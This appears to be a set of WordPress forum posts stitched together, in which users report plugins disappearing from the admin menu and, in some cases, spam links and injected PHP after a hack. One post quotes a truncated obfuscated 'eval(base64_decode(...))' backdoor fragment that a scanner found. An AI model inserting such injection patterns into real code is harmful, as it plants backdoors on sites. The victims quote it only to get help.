All the plugins are in the folder, I’ve tried to reset them in PHPMyAdmin, but the value was already “a:0:{}”. Also done the “plugins.hold” trick, still nothing. Looks like I’m not the only person having this issue, but so far I’ve not seen a working fix.
]]>I’ve got some troubles with my website. Underneath we got some nasty links with viagra and stuff. I want to delete those. I read it could be some code injection. What kind of code should I like for in my theme code?
Also all our plugins disappeared, could that be related?
Especially the SEO disappeared… Which is very painful since we had a good SEO proof website.
Thanks in advance!
]]>I did an upgrade of my wordpress to 4.2.2 and my customised plugin disappear from my left menu… not sure what happened.. have been using the customised plugin for the last 2 years so i really doesnt know what to examine..

]]>I can do without some of the plugins, but my favorite is yoast seo. So I tried to reinstall yoast but it said I already have the file for yoast. I went back to GoDaddy and deleted it from the database. Yoast still will not install. It says “install failed.”
I contacted Yoast and they said they don’t give support at all.
]]>I refresh, all of the plug ins are gone. But when I tried to reinstall one, it said failed because it was already installed.
So I login to check cpanel under “wp-content – plugins” they all there, however when i check the php code i found half page of malicious code injected before the normal <?php line.
I went into the other website admin realized it infected with the same issue.
I ran a virus scan on both of my sites all showing clean and no “god_mod” code attached.
I installed Exploit Scanner, after scan i found some code “Often used to execute malicious code” like:
33-712); $pcugcaixuf=$fezeqfmubo-1; ?><?php eval (base64_decode (“aWYgKGlzc2V0KCRfUkVRVUVTVFsnc21kJ10pKSB7IGV2YW
if all of my php got infected, how can I remove the code in once instead remove them one by one? I’m using Mac, wasn’t sure what caused this problem? been hacked?? I didn’t install the new plugin by the way. It’s just an update of a theme Avada within wordpress admin, not even an download and upload process.
Help please!!!! This is my whole 2 years work…
]]>I have trawlled the internet to find a solution and most solutions seems to involve deleting the plugins via FTP and then manually re-installing. I have tried this – but to no avail. Also, when I click on my plugins in the sites – no plugins are showing even though they are installed (manually or automatically – it’s the same).
I have also tried the other solution suggested which was to change the “tested until version ….” in the readme file to a later version than the wordpress I’m using. That did nothing. And some of the plugins don’t even have readme files.
But either way, I shouldnn’t have to be manually fixing this on EVERY plugin.
I thought it was something to do with the latest version of WordPress but the same thing is happening in my older websites and plugins that were working are now not working.
I don’t think it’s a browser issue because I get the same problem on my ipad using Safari as I do with Windows Google Crome.
PLEASE HELP – I have websites to finish this weekend.
]]>There seems to be a particular trigger when I open th eplugins option in wordpress theyn boom this code is suddenly injected into 350 plus files. My database is always intact so I get to fix it with my back ups but this is not healthy at all.
Help would be much appreciated.

I know they still exist, as they are listed in my wp-content/plugins directory.
When I try to install one of the pre-existing ones, it rightly says that I already have it. However, it’s not listed and and not functioning.
There weren’t very many plugins. They included standard ones that come with WordPress, plus Google Analytics, Contact Form 7, Really Simple Captcha, SEO by Yoast, and DiggDigg.
Since this happened, I installed a new plugin, and it shows on the list (a list of 1, at this point), as it should.
